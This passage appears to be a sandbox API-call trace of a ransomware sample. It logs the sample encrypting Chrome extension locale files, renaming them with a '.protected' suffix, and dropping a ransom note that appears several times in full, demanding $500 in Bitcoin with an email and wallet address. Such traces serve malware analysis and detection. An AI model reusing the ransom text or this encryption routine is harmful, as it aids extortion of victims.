dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.390] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.390] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.391] lstrlenA (lpString="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") returned 684 [0079.391] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.391] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.391] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.391] CloseHandle (hObject=0x164) returned 1 [0079.391] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0079.391] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0079.392] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko") returned 142 [0079.392] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0079.392] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0079.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*") returned 144 [0079.392] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.392] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.392] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.392] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.392] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.392] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\.") returned 144 [0079.392] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.392] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.392] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.392] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.392] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.392] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.392] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.392] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\..") returned 145 [0079.393] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.393] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0079.393] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.393] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.393] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.393] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.393] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.393] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.393] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.393] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json") returned 156 [0079.394] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.394] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.395] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.395] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.395] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.395] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.395] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.395] CloseHandle (hObject=0x168) returned 1 [0079.395] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.protected") returned 166 [0079.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json.protected")) returned 1 [0079.396] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.396] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.396] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\RESTORE_FILES.txt") returned 160 [0079.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0079.397] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.397] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.398] lstrlenA (lpString="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") returned 684 [0079.398] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.398] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.398] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.398] CloseHandle (hObject=0x164) returned 1 [0079.398] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0079.398] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0079.398] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt") returned 142 [0079.398] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0079.398] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0079.398] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*") returned 144 [0079.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.399] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.399] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.399] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.399] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\.") returned 144 [0079.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.399] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.399] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.399] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.399] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\..") returned 145 [0079.399] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.399] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.399] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.399] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.399] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.399] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.399] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.401] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.401] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json") returned 156 [0079.401] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.401] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11d, lpOverlapped=0x0) returned 1 [0079.402] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.402] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11d, lpOverlapped=0x0) returned 1 [0079.402] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.402] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.402] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.403] CloseHandle (hObject=0x168) returned 1 [0079.403] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.protected") returned 166 [0079.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.protected")) returned 1 [0079.403] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.403] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.403] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\RESTORE_FILES.txt") returned 160 [0079.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.405] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.405] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.406] lstrlenA (lpString="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") returned 684 [0079.406] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.406] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.406] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.407] CloseHandle (hObject=0x164) returned 1 [0079.407] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0079.407] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0079.407] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 